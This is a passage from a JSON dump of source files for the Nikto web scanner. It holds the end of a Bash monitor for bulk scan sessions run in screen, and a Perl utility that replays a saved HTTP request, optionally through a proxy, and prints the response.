continue\n        session_name=$(echo \"$line\" | awk '{print $1}' | sed 's/^[0-9]*\\.//' 2>/dev/null || echo \"unknown\")\n        status=$(echo \"$line\" | awk '{for(i=2;i<NF;i++) printf \"%s \", $i; print $NF}' 2>/dev/null || echo \"unknown\")\n        echo \"    • ${session_name} - ${status}\"\n      done\n    else\n      if [[ \"$consecutive_zeros\" -lt 2 ]]; then\n        echo \"  Waiting for sessions to start...\"\n      else\n        echo \"  ✓ All scans completed!\"\n      fi\n    fi\n    \n    echo \"\"\n    echo \"  (Press Ctrl+C to exit monitor)\"\n    \n    last_count=$running\n    \n    # Exit if all scans are done (wait a few checks to be sure)\n    if [[ \"$running\" -eq 0 ]] && [[ \"$total_scans\" -gt 0 ]]; then\n      consecutive_zeros=$((consecutive_zeros + 1))\n      if [[ \"$consecutive_zeros\" -ge 3 ]]; then\n        sleep 1\n        clear\n        echo \"╔════════════════════════════════════════════════════════╗\"\n        echo \"║          All Scans Completed!                          ║\"\n        echo \"╚════════════════════════════════════════════════════════╝\"\n        echo \"\"\n        echo \"  Total sessions:  ${total_scans}\"\n        echo \"  Completed:       ${total_scans}\"\n        echo \"\"\n        set -e\n        break\n      fi\n    else\n      consecutive_zeros=0\n    fi\n    \n    # Always sleep to prevent tight loop - this is critical for the loop to continue\n    sleep 2 || sleep 1 || sleep 0.5 || true\n  done\n  \n  # Clear trap on exit and re-enable error handling\n  trap - INT TERM\n  set -e\n}\n\n# Start monitoring (with error handling to prevent script exit)\nmonitor_scans || {\n  echo \"\"\n  echo \"Monitor exited. Check screen sessions manually: screen -ls | grep nikbulk_\"\n  exit 0\n}\n"
  },
  {
    "path": "program/utils/replay.pl",
    "content": "#!/usr/bin/perl\nuse strict;\nuse warnings;\n\n###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE:Replay a saved request\n###############################################################################\nuse Getopt::Long;\nuse JSON::PP;\nuse FindBin;\nuse File::Spec;\n\n# Determine the program directory (parent of utils/)\n# Use RealBin to get absolute path even if script was invoked via symlink\nmy $program_dir = File::Spec->catdir($FindBin::RealBin || $FindBin::Bin, '..');\n$program_dir = File::Spec->rel2abs($program_dir);\n\n# Define replay_usage() to avoid function name collision with nikto_core.plugin's usage()\nsub replay_usage {\n    print \"replay.pl -- Replay a saved scan result\\n\";\n    print \"     -file \t\tParse request from this file\\n\";\n    print \"     -proxy\t\tSend request through this proxy (format: host:port)\\n\";\n    print \"     -help\t\tHelp output\\n\";\n    exit;\n}\n\n# Save @ARGV before requiring nikto_core.plugin (it may process @ARGV)\nmy @saved_argv = @ARGV;\n\nrequire File::Spec->catfile($program_dir, 'plugins', 'LW2.pm');\nrequire File::Spec->catfile($program_dir, 'plugins', 'nikto_core.plugin');\n\n# Restore @ARGV for our own GetOptions processing\n@ARGV = @saved_argv;\n\n# Initialize variables\nmy $infile = '';\nmy $proxy  = '';\nmy $header = '';\nmy $s_request;\nmy %request;\nmy %result;\n\nLW2::http_init_request(\\%request);\n\n# options\nGetOptions(\"help\"    => \\&replay_usage,\n           \"file=s\"  => \\$infile,\n           \"proxy=s\" => \\$proxy\n           )\n  or replay_usage();\n\n# Check for file argument if not provided via -file\nif ($infile eq '' && @ARGV > 0 && -r $ARGV[0]) {\n    $infile = $ARGV[0];\n}\n\nif ($infile eq '') {\n    replay_usage();\n}\n\n# load save file\nif (!-r $infile) {\n    print \"ERROR: Argument 1 should be '-help' or a Nikto save file\\n\\n\";\n    exit 1;\n}\n\nopen(my $INFILE, \"<$infile\") || die \"Unable to open file: $!\\n\\n\";\nwhile (<$INFILE>) {\n    if ($_ =~ /^(Test ID|Message|References):/) { $header .= $_; next; }\n    next unless $_ =~ /^REQUEST:/;\n    chomp;\n    $_ =~ s/^REQUEST://;\n    $s_request = JSON::PP->new->utf8(1)->allow_nonref(1)->decode($_);\n    if (ref($s_request) ne 'HASH') {\n        print \"ERROR: Unable to read JSON into request structure\\n\";\n        exit 1;\n    }\n}\nclose($INFILE);\n\n# set into request hash\nforeach my $key (keys %{$s_request}) {\n    $request{$key} = $s_request->{$key};\n}\n\n# proxy\nif ($proxy ne '') {\n    my @p = split(/:/, $proxy);\n    if (($p[0] eq '') || ($p[1] eq '') || ($p[1] =~ /[^\\d]/)) {\n        print \"ERROR: Invalid proxy -- use 'host:port' format\\n\";\n        exit 1;\n    }\n    $request{'whisker'}->{'proxy_host'} = $p[0];\n    $request{'whisker'}->{'proxy_port'} = $p[1];\n}\n\n# output for the user\nprint \"-\" x 44, \"  Info\\n\";\nprint \"Request to:     http\";\nprint \"s\" if $request{'whisker'}->{'ssl'};\nprint \"://\"\n  . $request{'whisker'}->{'host'} . \":\"\n  . $request{'whisker'}->{'port'}\n  . $request{'whisker'}->{'uri'} . \"\\n\";\nprint $header;\n\n# make request\nLW2::http_fixup_request(\\%request);\nLW2::http_do_request_timeout(\\%request, \\%result);\n\n# output for the user\nprint \"-\" x 44, \"  Response\\n\";\n\n# Use rebuild_response to properly format the response\nprint rebuild_response(\\%result, 1);\n"
  }
]